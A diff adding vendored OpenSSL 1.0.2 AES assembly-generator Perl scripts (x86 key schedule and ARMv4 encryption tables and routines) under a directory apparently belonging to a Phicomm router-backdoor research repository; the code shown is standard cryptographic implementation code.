+		&movz	("ebx",&BP(-128,$tbl,"esi",1));
+		&shr	("edx",16);
+		&shl	("ebx",8);
+		&movz	("esi",&LB("edx"));		# rk[11]>>16
+		&xor	("eax","ebx");
+
+		&movz	("ebx",&BP(-128,$tbl,"esi",1));
+		&movz	("esi",&HB("edx"));		# rk[11]>>24
+		&shl	("ebx",16);
+		&xor	("eax","ebx");
+
+		&movz	("ebx",&BP(-128,$tbl,"esi",1));
+		&shl	("ebx",24);
+		&xor	("eax","ebx");
+
+		&mov	(&DWP(48,"edi"),"eax");		# rk[12]
+		&xor	("eax",&DWP(20,"edi"));
+		&mov	(&DWP(52,"edi"),"eax");		# rk[13]
+		&xor	("eax",&DWP(24,"edi"));
+		&mov	(&DWP(56,"edi"),"eax");		# rk[14]
+		&xor	("eax",&DWP(28,"edi"));
+		&mov	(&DWP(60,"edi"),"eax");		# rk[15]
+
+		&add	("edi",32);
+	&jmp	(&label("14loop"));
+
+	&set_label("14break");
+	&mov	(&DWP(48,"edi"),14);		# setup number of rounds
+	&xor	("eax","eax");
+	&jmp	(&label("exit"));
+
+    &set_label("badpointer");
+	&mov	("eax",-1);
+    &set_label("exit");
+&function_end("_x86_AES_set_encrypt_key");
+
+# int private_AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+#                        AES_KEY *key)
+&function_begin_B("private_AES_set_encrypt_key");
+	&call	("_x86_AES_set_encrypt_key");
+	&ret	();
+&function_end_B("private_AES_set_encrypt_key");
+
+sub deckey()
+{ my ($i,$key,$tp1,$tp2,$tp4,$tp8) = @_;
+  my $tmp = $tbl;
+
+	&mov	($tmp,0x80808080);
+	&and	($tmp,$tp1);
+	&lea	($tp2,&DWP(0,$tp1,$tp1));
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&sub	($acc,$tmp);
+	&and	($tp2,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	&xor	($tp2,$acc);
+	&mov	($tmp,0x80808080);
+
+	&and	($tmp,$tp2);
+	&lea	($tp4,&DWP(0,$tp2,$tp2));
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	&sub	($acc,$tmp);
+	&and	($tp4,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	 &xor	($tp2,$tp1);	# tp2^tp1
+	&xor	($tp4,$acc);
+	&mov	($tmp,0x80808080);
+
+	&and	($tmp,$tp4);
+	&lea	($tp8,&DWP(0,$tp4,$tp4));
+	&mov	($acc,$tmp);
+	&shr	($tmp,7);
+	 &xor	($tp4,$tp1);	# tp4^tp1
+	&sub	($acc,$tmp);
+	&and	($tp8,0xfefefefe);
+	&and	($acc,0x1b1b1b1b);
+	 &rotl	($tp1,8);	# = ROTATE(tp1,8)
+	&xor	($tp8,$acc);
+
+	&mov	($tmp,&DWP(4*($i+1),$key));	# modulo-scheduled load
+
+	&xor	($tp1,$tp2);
+	&xor	($tp2,$tp8);
+	&xor	($tp1,$tp4);
+	&rotl	($tp2,24);
+	&xor	($tp4,$tp8);
+	&xor	($tp1,$tp8);	# ^= tp8^(tp4^tp1)^(tp2^tp1)
+	&rotl	($tp4,16);
+	&xor	($tp1,$tp2);	# ^= ROTATE(tp8^tp2^tp1,24)
+	&rotl	($tp8,8);
+	&xor	($tp1,$tp4);	# ^= ROTATE(tp8^tp4^tp1,16)
+	&mov	($tp2,$tmp);
+	&xor	($tp1,$tp8);	# ^= ROTATE(tp8,8)
+
+	&mov	(&DWP(4*$i,$key),$tp1);
+}
+
+# int private_AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+#                        AES_KEY *key)
+&function_begin_B("private_AES_set_decrypt_key");
+	&call	("_x86_AES_set_encrypt_key");
+	&cmp	("eax",0);
+	&je	(&label("proceed"));
+	&ret	();
+
+    &set_label("proceed");
+	&push	("ebp");
+	&push	("ebx");
+	&push	("esi");
+	&push	("edi");
+
+	&mov	("esi",&wparam(2));
+	&mov	("ecx",&DWP(240,"esi"));	# pull number of rounds
+	&lea	("ecx",&DWP(0,"","ecx",4));
+	&lea	("edi",&DWP(0,"esi","ecx",4));	# pointer to last chunk
+
+	&set_label("invert",4);			# invert order of chunks
+		&mov	("eax",&DWP(0,"esi"));
+		&mov	("ebx",&DWP(4,"esi"));
+		&mov	("ecx",&DWP(0,"edi"));
+		&mov	("edx",&DWP(4,"edi"));
+		&mov	(&DWP(0,"edi"),"eax");
+		&mov	(&DWP(4,"edi"),"ebx");
+		&mov	(&DWP(0,"esi"),"ecx");
+		&mov	(&DWP(4,"esi"),"edx");
+		&mov	("eax",&DWP(8,"esi"));
+		&mov	("ebx",&DWP(12,"esi"));
+		&mov	("ecx",&DWP(8,"edi"));
+		&mov	("edx",&DWP(12,"edi"));
+		&mov	(&DWP(8,"edi"),"eax");
+		&mov	(&DWP(12,"edi"),"ebx");
+		&mov	(&DWP(8,"esi"),"ecx");
+		&mov	(&DWP(12,"esi"),"edx");
+		&add	("esi",16);
+		&sub	("edi",16);
+		&cmp	("esi","edi");
+	&jne	(&label("invert"));
+
+	&mov	($key,&wparam(2));
+	&mov	($acc,&DWP(240,$key));		# pull number of rounds
+	&lea	($acc,&DWP(-2,$acc,$acc));
+	&lea	($acc,&DWP(0,$key,$acc,8));
+	&mov	(&wparam(2),$acc);
+
+	&mov	($s0,&DWP(16,$key));		# modulo-scheduled load
+	&set_label("permute",4);		# permute the key schedule
+		&add	($key,16);
+		&deckey	(0,$key,$s0,$s1,$s2,$s3);
+		&deckey	(1,$key,$s1,$s2,$s3,$s0);
+		&deckey	(2,$key,$s2,$s3,$s0,$s1);
+		&deckey	(3,$key,$s3,$s0,$s1,$s2);
+		&cmp	($key,&wparam(2));
+	&jb	(&label("permute"));
+
+	&xor	("eax","eax");			# return success
+&function_end("private_AES_set_decrypt_key");
+&asciz("AES for x86, CRYPTOGAMS by <appro\@openssl.org>");
+
+&asm_finish();
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-armv4.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-armv4.pl
new file mode 100644
index 0000000..4f89170
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/asm/aes-armv4.pl
@@ -0,0 +1,1217 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# AES for ARMv4
+
+# January 2007.
+#
+# Code uses single 1K S-box and is >2 times faster than code generated
+# by gcc-3.4.1. This is thanks to unique feature of ARMv4 ISA, which
+# allows to merge logical or arithmetic operation with shift or rotate
+# in one instruction and emit combined result every cycle. The module
+# is endian-neutral. The performance is ~42 cycles/byte for 128-bit
+# key [on single-issue Xscale PXA250 core].
+
+# May 2007.
+#
+# AES_set_[en|de]crypt_key is added.
+
+# July 2010.
+#
+# Rescheduling for dual-issue pipeline resulted in 12% improvement on
+# Cortex A8 core and ~25 cycles per byte processed with 128-bit key.
+
+# February 2011.
+#
+# Profiler-assisted and platform-specific optimization resulted in 16%
+# improvement on Cortex A8 core and ~21.5 cycles per byte.
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$s0="r0";
+$s1="r1";
+$s2="r2";
+$s3="r3";
+$t1="r4";
+$t2="r5";
+$t3="r6";
+$i1="r7";
+$i2="r8";
+$i3="r9";
+
+$tbl="r10";
+$key="r11";
+$rounds="r12";
+
+$code=<<___;
+#ifndef __KERNEL__
+# include "arm_arch.h"
+#else
+# define __ARM_ARCH__ __LINUX_ARM_ARCH__
+#endif
+
+.text
+#if __ARM_ARCH__<7
+.code	32
+#else
+.syntax	unified
+# ifdef __thumb2__
+.thumb
+# else
+.code	32
+# endif
+#endif
+
+.type	AES_Te,%object
+.align	5
+AES_Te:
+.word	0xc66363a5, 0xf87c7c84, 0xee777799, 0xf67b7b8d
+.word	0xfff2f20d, 0xd66b6bbd, 0xde6f6fb1, 0x91c5c554
+.word	0x60303050, 0x02010103, 0xce6767a9, 0x562b2b7d
+.word	0xe7fefe19, 0xb5d7d762, 0x4dababe6, 0xec76769a
+.word	0x8fcaca45, 0x1f82829d, 0x89c9c940, 0xfa7d7d87
+.word	0xeffafa15, 0xb25959eb, 0x8e4747c9, 0xfbf0f00b
+.word	0x41adadec, 0xb3d4d467, 0x5fa2a2fd, 0x45afafea
+.word	0x239c9cbf, 0x53a4a4f7, 0xe4727296, 0x9bc0c05b
+.word	0x75b7b7c2, 0xe1fdfd1c, 0x3d9393ae, 0x4c26266a
+.word	0x6c36365a, 0x7e3f3f41, 0xf5f7f702, 0x83cccc4f
+.word	0x6834345c, 0x51a5a5f4, 0xd1e5e534, 0xf9f1f108
+.word	0xe2717193, 0xabd8d873, 0x62313153, 0x2a15153f
+.word	0x0804040c, 0x95c7c752, 0x46232365, 0x9dc3c35e
+.word	0x30181828, 0x379696a1, 0x0a05050f, 0x2f9a9ab5
+.word	0x0e070709, 0x24121236, 0x1b80809b, 0xdfe2e23d
+.word	0xcdebeb26, 0x4e272769, 0x7fb2b2cd, 0xea75759f
+.word	0x1209091b, 0x1d83839e, 0x582c2c74, 0x341a1a2e
+.word	0x361b1b2d, 0xdc6e6eb2, 0xb45a5aee, 0x5ba0a0fb
+.word	0xa45252f6, 0x763b3b4d, 0xb7d6d661, 0x7db3b3ce
+.word	0x5229297b, 0xdde3e33e, 0x5e2f2f71, 0x13848497
+.word	0xa65353f5, 0xb9d1d168, 0x00000000, 0xc1eded2c
+.word	0x40202060, 0xe3fcfc1f, 0x79b1b1c8, 0xb65b5bed
+.word	0xd46a6abe, 0x8dcbcb46, 0x67bebed9, 0x7239394b
+.word	0x944a4ade, 0x984c4cd4, 0xb05858e8, 0x85cfcf4a
+.word	0xbbd0d06b, 0xc5efef2a, 0x4faaaae5, 0xedfbfb16
+.word	0x864343c5, 0x9a4d4dd7, 0x66333355, 0x11858594
+.word	0x8a4545cf, 0xe9f9f910, 0x04020206, 0xfe7f7f81
+.word	0xa05050f0, 0x783c3c44, 0x259f9fba, 0x4ba8a8e3
+.word	0xa25151f3, 0x5da3a3fe, 0x804040c0, 0x058f8f8a
+.word	0x3f9292ad, 0x219d9dbc, 0x70383848, 0xf1f5f504
+.word	0x63bcbcdf, 0x77b6b6c1, 0xafdada75, 0x42212163
+.word	0x20101030, 0xe5ffff1a, 0xfdf3f30e, 0xbfd2d26d
+.word	0x81cdcd4c, 0x180c0c14, 0x26131335, 0xc3ecec2f
+.word	0xbe5f5fe1, 0x359797a2, 0x884444cc, 0x2e171739
+.word	0x93c4c457, 0x55a7a7f2, 0xfc7e7e82, 0x7a3d3d47
+.word	0xc86464ac, 0xba5d5de7, 0x3219192b, 0xe6737395
+.word	0xc06060a0, 0x19818198, 0x9e4f4fd1, 0xa3dcdc7f
+.word	0x44222266, 0x542a2a7e, 0x3b9090ab, 0x0b888883
+.word	0x8c4646ca, 0xc7eeee29, 0x6bb8b8d3, 0x2814143c
+.word	0xa7dede79, 0xbc5e5ee2, 0x160b0b1d, 0xaddbdb76
+.word	0xdbe0e03b, 0x64323256, 0x743a3a4e, 0x140a0a1e
+.word	0x924949db, 0x0c06060a, 0x4824246c, 0xb85c5ce4
+.word	0x9fc2c25d, 0xbdd3d36e, 0x43acacef, 0xc46262a6
+.word	0x399191a8, 0x319595a4, 0xd3e4e437, 0xf279798b
+.word	0xd5e7e732, 0x8bc8c843, 0x6e373759, 0xda6d6db7
+.word	0x018d8d8c, 0xb1d5d564, 0x9c4e4ed2, 0x49a9a9e0
+.word	0xd86c6cb4, 0xac5656fa, 0xf3f4f407, 0xcfeaea25
+.word	0xca6565af, 0xf47a7a8e, 0x47aeaee9, 0x10080818
+.word	0x6fbabad5, 0xf0787888, 0x4a25256f, 0x5c2e2e72
+.word	0x381c1c24, 0x57a6a6f1, 0x73b4b4c7, 0x97c6c651
+.word	0xcbe8e823, 0xa1dddd7c, 0xe874749c, 0x3e1f1f21
+.word	0x964b4bdd, 0x61bdbddc, 0x0d8b8b86, 0x0f8a8a85
+.word	0xe0707090, 0x7c3e3e42, 0x71b5b5c4, 0xcc6666aa
+.word	0x904848d8, 0x06030305, 0xf7f6f601, 0x1c0e0e12
+.word	0xc26161a3, 0x6a35355f, 0xae5757f9, 0x69b9b9d0
+.word	0x17868691, 0x99c1c158, 0x3a1d1d27, 0x279e9eb9
+.word	0xd9e1e138, 0xebf8f813, 0x2b9898b3, 0x22111133
+.word	0xd26969bb, 0xa9d9d970, 0x078e8e89, 0x339494a7
+.word	0x2d9b9bb6, 0x3c1e1e22, 0x15878792, 0xc9e9e920
+.word	0x87cece49, 0xaa5555ff, 0x50282878, 0xa5dfdf7a
+.word	0x038c8c8f, 0x59a1a1f8, 0x09898980, 0x1a0d0d17
+.word	0x65bfbfda, 0xd7e6e631, 0x844242c6, 0xd06868b8
+.word	0x824141c3, 0x299999b0, 0x5a2d2d77, 0x1e0f0f11
+.word	0x7bb0b0cb, 0xa85454fc, 0x6dbbbbd6, 0x2c16163a
+@ Te4[256]
+.byte	0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5
+.byte	0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76
+.byte	0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0
+.byte	0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0
+.byte	0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc
+.byte	0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15
+.byte	0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a
+.byte	0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75
+.byte	0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0
+.byte	0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84
+.byte	0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b
+.byte	0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf
+.byte	0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85
+.byte	0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8
+.byte	0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5
+.byte	0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2
+.byte	0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17
+.byte	0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
+.byte	0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
+.byte	0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
+.byte	0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
+.byte	0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
+.byte	0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
+.byte	0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
+.byte	0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
+.byte	0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
+.byte	0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
+.byte	0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
+.byte	0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
+.byte	0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
+.byte	0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
+.byte	0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
+@ rcon[]
+.word	0x01000000, 0x02000000, 0x04000000, 0x08000000
+.word	0x10000000, 0x20000000, 0x40000000, 0x80000000
+.word	0x1B000000, 0x36000000, 0, 0, 0, 0, 0, 0
+.size	AES_Te,.-AES_Te
+
+@ void AES_encrypt(const unsigned char *in, unsigned char *out,
+@ 		 const AES_KEY *key) {
+.global AES_encrypt
+.type   AES_encrypt,%function
+.align	5
+AES_encrypt:
+#if __ARM_ARCH__<7
+	sub	r3,pc,#8		@ AES_encrypt
+#else
+	adr	r3,AES_encrypt
+#endif
+	stmdb   sp!,{r1,r4-r12,lr}
+	mov	$rounds,r0		@ inp
+	mov	$key,r2
+	sub	$tbl,r3,#AES_encrypt-AES_Te	@ Te
+#if __ARM_ARCH__<7
+	ldrb	$s0,[$rounds,#3]	@ load input data in endian-neutral
+	ldrb	$t1,[$rounds,#2]	@ manner...
+	ldrb	$t2,[$rounds,#1]
+	ldrb	$t3,[$rounds,#0]
+	orr	$s0,$s0,$t1,lsl#8
+	ldrb	$s1,[$rounds,#7]
+	orr	$s0,$s0,$t2,lsl#16
+	ldrb	$t1,[$rounds,#6]
+	orr	$s0,$s0,$t3,lsl#24
+	ldrb	$t2,[$rounds,#5]
+	ldrb	$t3,[$rounds,#4]
+	orr	$s1,$s1,$t1,lsl#8
+	ldrb	$s2,[$rounds,#11]
+	orr	$s1,$s1,$t2,lsl#16
+	ldrb	$t1,[$rounds,#10]
+	orr	$s1,$s1,$t3,lsl#24
+	ldrb	$t2,[$rounds,#9]
+	ldrb	$t3,[$rounds,#8]
+	orr	$s2,$s2,$t1,lsl#8
+	ldrb	$s3,[$rounds,#15]
+	orr	$s2,$s2,$t2,lsl#16
+	ldrb	$t1,[$rounds,#14]
+	orr	$s2,$s2,$t3,lsl#24
+	ldrb	$t2,[$rounds,#13]
+	ldrb	$t3,[$rounds,#12]
+	orr	$s3,$s3,$t1,lsl#8
+	orr	$s3,$s3,$t2,lsl#16
+	orr	$s3,$s3,$t3,lsl#24
+#else
+	ldr	$s0,[$rounds,#0]
+	ldr	$s1,[$rounds,#4]
+	ldr	$s2,[$rounds,#8]
+	ldr	$s3,[$rounds,#12]
+#ifdef __ARMEL__
+	rev	$s0,$s0
+	rev	$s1,$s1
+	rev	$s2,$s2
+	rev	$s3,$s3
+#endif
+#endif
+	bl	_armv4_AES_encrypt
+
+	ldr	$rounds,[sp],#4		@ pop out
+#if __ARM_ARCH__>=7
+#ifdef __ARMEL__
+	rev	$s0,$s0
+	rev	$s1,$s1
+	rev	$s2,$s2
+	rev	$s3,$s3
+#endif
+	str	$s0,[$rounds,#0]
+	str	$s1,[$rounds,#4]
+	str	$s2,[$rounds,#8]
+	str	$s3,[$rounds,#12]
+#else
+	mov	$t1,$s0,lsr#24		@ write output in endian-neutral
+	mov	$t2,$s0,lsr#16		@ manner...
+	mov	$t3,$s0,lsr#8
+	strb	$t1,[$rounds,#0]
+	strb	$t2,[$rounds,#1]
+	mov	$t1,$s1,lsr#24
+	strb	$t3,[$rounds,#2]
+	mov	$t2,$s1,lsr#16
+	strb	$s0,[$rounds,#3]
+	mov	$t3,$s1,lsr#8
+	strb	$t1,[$rounds,#4]
+	strb	$t2,[$rounds,#5]
+	mov	$t1,$s2,lsr#24
+	strb	$t3,[$rounds,#6]
+	mov	$t2,$s2,lsr#16
+	strb	$s1,[$rounds,#7]
+	mov	$t3,$s2,lsr#8
+	strb	$t1,[$rounds,#8]
+	strb	$t2,[$rounds,#9]
+	mov	$t1,$s3,lsr#24
+	strb	$t3,[$rounds,#10]
+	mov	$t2,$s3,lsr#16
+	strb	$s2,[$rounds,#11]
+	mov	$t3,$s3,lsr#8
+	strb	$t1,[$rounds,#12]
+	strb	$t2,[$rounds,#13]
+	strb	$t3,[$rounds,#14]
+	strb	$s3,[$rounds,#15]
+#endif
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r12,pc}
+#else
+	ldmia   sp!,{r4-r12,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	AES_encrypt,.-AES_encrypt
+
+.type   _armv4_AES_encrypt,%function
+.align	2
+_armv4_AES_encrypt:
+	str	lr,[sp,#-4]!		@ push lr
+	ldmia	$key!,{$t1-$i1}
+	eor	$s0,$s0,$t1
+	ldr	$rounds,[$key,#240-16]
+	eor	$s1,$s1,$t2
+	eor	$s2,$s2,$t3
+	eor	$s3,$s3,$i1
+	sub	$rounds,$rounds,#1
+	mov	lr,#255
+
+	and	$i1,lr,$s0
+	and	$i2,lr,$s0,lsr#8
+	and	$i3,lr,$s0,lsr#16
+	mov	$s0,$s0,lsr#24
+.Lenc_loop:
+	ldr	$t1,[$tbl,$i1,lsl#2]	@ Te3[s0>>0]
+	and	$i1,lr,$s1,lsr#16	@ i0
+	ldr	$t2,[$tbl,$i2,lsl#2]	@ Te2[s0>>8]
+	and	$i2,lr,$s1
+	ldr	$t3,[$tbl,$i3,lsl#2]	@ Te1[s0>>16]
+	and	$i3,lr,$s1,lsr#8
+	ldr	$s0,[$tbl,$s0,lsl#2]	@ Te0[s0>>24]
+	mov	$s1,$s1,lsr#24
+
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Te1[s1>>16]
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Te3[s1>>0]
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Te2[s1>>8]
+	eor	$s0,$s0,$i1,ror#8
+	ldr	$s1,[$tbl,$s1,lsl#2]	@ Te0[s1>>24]
+	and	$i1,lr,$s2,lsr#8	@ i0
+	eor	$t2,$t2,$i2,ror#8
+	and	$i2,lr,$s2,lsr#16	@ i1
+	eor	$t3,$t3,$i3,ror#8
+	and	$i3,lr,$s2
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Te2[s2>>8]
+	eor	$s1,$s1,$t1,ror#24
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Te1[s2>>16]
+	mov	$s2,$s2,lsr#24
+
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Te3[s2>>0]
+	eor	$s0,$s0,$i1,ror#16
+	ldr	$s2,[$tbl,$s2,lsl#2]	@ Te0[s2>>24]
+	and	$i1,lr,$s3		@ i0
+	eor	$s1,$s1,$i2,ror#8
+	and	$i2,lr,$s3,lsr#8	@ i1
+	eor	$t3,$t3,$i3,ror#16
+	and	$i3,lr,$s3,lsr#16	@ i2
+	ldr	$i1,[$tbl,$i1,lsl#2]	@ Te3[s3>>0]
+	eor	$s2,$s2,$t2,ror#16
+	ldr	$i2,[$tbl,$i2,lsl#2]	@ Te2[s3>>8]
+	mov	$s3,$s3,lsr#24
+
+	ldr	$i3,[$tbl,$i3,lsl#2]	@ Te1[s3>>16]
+	eor	$s0,$s0,$i1,ror#24
+	ldr	$i1,[$key],#16
+	eor	$s1,$s1,$i2,ror#16
+	ldr	$s3,[$tbl,$s3,lsl#2]	@ Te0[s3>>24]
+	eor	$s2,$s2,$i3,ror#8
+	ldr	$t1,[$key,#-12]
+	eor	$s3,$s3,$t3,ror#8
+
+	ldr	$t2,[$key,#-8]
+	eor	$s0,$s0,$i1
+	ldr	$t3,[$key,#-4]
+	and	$i1,lr,$s0
+	eor	$s1,$s1,$t1
+	and	$i2,lr,$s0,lsr#8
+	eor	$s2,$s2,$t2
+	and	$i3,lr,$s0,lsr#16
+	eor	$s3,$s3,$t3
+	mov	$s0,$s0,lsr#24
+
+	subs	$rounds,$rounds,#1
+	bne	.Lenc_loop
+
+	add	$tbl,$tbl,#2
+
+	ldrb	$t1,[$tbl,$i1,lsl#2]	@ Te4[s0>>0]
+	and	$i1,lr,$s1,lsr#16	@ i0
+	ldrb	$t2,[$tbl,$i2,lsl#2]	@ Te4[s0>>8]
+	and	$i2,lr,$s1
+	ldrb	$t3,[$tbl,$i3,lsl#2]	@ Te4[s0>>16]
+	and	$i3,lr,$s1,lsr#8
+	ldrb	$s0,[$tbl,$s0,lsl#2]	@ Te4[s0>>24]
+	mov	$s1,$s1,lsr#24
+
+	ldrb	$i1,[$tbl,$i1,lsl#2]	@ Te4[s1>>16]
+	ldrb	$i2,[$tbl,$i2,lsl#2]	@ Te4[s1>>0]
+	ldrb	$i3,[$tbl,$i3,lsl#2]	@ Te4[s1>>8]
+	eor	$s0,$i1,$s0,lsl#8
+	ldrb	$s1,[$tbl,$s1,lsl#2]	@ Te4[s1>>24]
+	and	$i1,lr,$s2,lsr#8	@ i0
+	eor	$t2,$i2,$t2,lsl#8
+	and	$i2,lr,$s2,lsr#16	@ i1
+	eor	$t3,$i3,$t3,lsl#8
+	and	$i3,lr,$s2
+	ldrb	$i1,[$tbl,$i1,lsl#2]	@ Te4[s2>>8]
+	eor	$s1,$t1,$s1,lsl#24
+	ldrb	$i2,[$tbl,$i2,lsl#2]	@ Te4[s2>>16]
+	mov	$s2,$s2,lsr#24
+
+	ldrb	$i3,[$tbl,$i3,lsl#2]	@ Te4[s2>>0]
+	eor	$s0,$i1,$s0,lsl#8
+	ldrb	$s2,[$tbl,$s2,lsl#2]	@ Te4[s2>>24]
+	and	$i1,lr,$s3		@ i0
+	eor	$s1,$s1,$i2,lsl#16
+	and	$i2,lr,$s3,lsr#8	@ i1
+	eor	$t3,$i3,$t3,lsl#8
+	and	$i3,lr,$s3,lsr#16	@ i2
+	ldrb	$i1,[$tbl,$i1,lsl#2]	@ Te4[s3>>0]
+	eor	$s2,$t2,$s2,lsl#24
+	ldrb	$i2,[$tbl,$i2,lsl#2]	@ Te4[s3>>8]
+	mov	$s3,$s3,lsr#24
+
+	ldrb	$i3,[$tbl,$i3,lsl#2]	@ Te4[s3>>16]
+	eor	$s0,$i1,$s0,lsl#8
+	ldr	$i1,[$key,#0]
+	ldrb	$s3,[$tbl,$s3,lsl#2]	@ Te4[s3>>24]
+	eor	$s1,$s1,$i2,lsl#8
+	ldr	$t1,[$key,#4]
+	eor	$s2,$s2,$i3,lsl#16
+	ldr	$t2,[$key,#8]
+	eor	$s3,$t3,$s3,lsl#24
+	ldr	$t3,[$key,#12]
+
+	eor	$s0,$s0,$i1
+	eor	$s1,$s1,$t1
+	eor	$s2,$s2,$t2
+	eor	$s3,$s3,$t3
+
+	sub	$tbl,$tbl,#2
+	ldr	pc,[sp],#4		@ pop and return
+.size	_armv4_AES_encrypt,.-_armv4_AES_encrypt
+
+.global private_AES_set_encrypt_key
+.type   private_AES_set_encrypt_key,%function
+.align	5
+private_AES_set_encrypt_key:
+_armv4_AES_set_encrypt_key:
+#if __ARM_ARCH__<7
+	sub	r3,pc,#8		@ AES_set_encrypt_key
+#else
+	adr	r3,private_AES_set_encrypt_key
+#endif
+	teq	r0,#0
+#if __ARM_ARCH__>=7
+	itt	eq			@ Thumb2 thing, sanity check in ARM
+#endif
+	moveq	r0,#-1
+	beq	.Labrt
+	teq	r2,#0
+#if __ARM_ARCH__>=7
+	itt	eq			@ Thumb2 thing, sanity check in ARM
+#endif
+	moveq	r0,#-1
+	beq	.Labrt
+
+	teq	r1,#128
+	beq	.Lok
+	teq	r1,#192
+	beq	.Lok
+	teq	r1,#256
+#if __ARM_ARCH__>=7
+	itt	ne			@ Thumb2 thing, sanity check in ARM
+#endif
+	movne	r0,#-1
+	bne	.Labrt
+
+.Lok:	stmdb   sp!,{r4-r12,lr}
+	sub	$tbl,r3,#_armv4_AES_set_encrypt_key-AES_Te-1024	@ Te4
+
+	mov	$rounds,r0		@ inp
+	mov	lr,r1			@ bits
+	mov	$key,r2			@ key
+
+#if __ARM_ARCH__<7
+	ldrb	$s0,[$rounds,#3]	@ load input data in endian-neutral
+	ldrb	$t1,[$rounds,#2]	@ manner...
+	ldrb	$t2,[$rounds,#1]
+	ldrb	$t3,[$rounds,#0]
+	orr	$s0,$s0,$t1,lsl#8
+	ldrb	$s1,[$rounds,#7]
+	orr	$s0,$s0,$t2,lsl#16
+	ldrb	$t1,[$rounds,#6]
+	orr	$s0,$s0,$t3,lsl#24
+	ldrb	$t2,[$rounds,#5]
+	ldrb	$t3,[$rounds,#4]
+	orr	$s1,$s1,$t1,lsl#8
+	ldrb	$s2,[$rounds,#11]
+	orr	$s1,$s1,$t2,lsl#16
+	ldrb	$t1,[$rounds,#10]
+	orr	$s1,$s1,$t3,lsl#24
+	ldrb	$t2,[$rounds,#9]
+	ldrb	$t3,[$rounds,#8]
+	orr	$s2,$s2,$t1,lsl#8
+	ldrb	$s3,[$rounds,#15]
+	orr	$s2,$s2,$t2,lsl#16
+	ldrb	$t1,[$rounds,#14]
+	orr	$s2,$s2,$t3,lsl#24
+	ldrb	$t2,[$rounds,#13]
+	ldrb	$t3,[$rounds,#12]
+	orr	$s3,$s3,$t1,lsl#8
+	str	$s0,[$key],#16
+	orr	$s3,$s3,$t2,lsl#16
+	str	$s1,[$key,#-12]
+	orr	$s3,$s3,$t3,lsl#24
+	str	$s2,[$key,#-8]
+	str	$s3,[$key,#-4]
+#else
+	ldr	$s0,[$rounds,#0]
+	ldr	$s1,[$rounds,#4]
+	ldr	$s2,[$rounds,#8]
+	ldr	$s3,[$rounds,#12]
+#ifdef __ARMEL__
+	rev	$s0,$s0
+	rev	$s1,$s1
+	rev	$s2,$s2
+	rev	$s3,$s3
+#endif
+	str	$s0,[$key],#16
+	str	$s1,[$key,#-12]
+	str	$s2,[$key,#-8]
+	str	$s3,[$key,#-4]
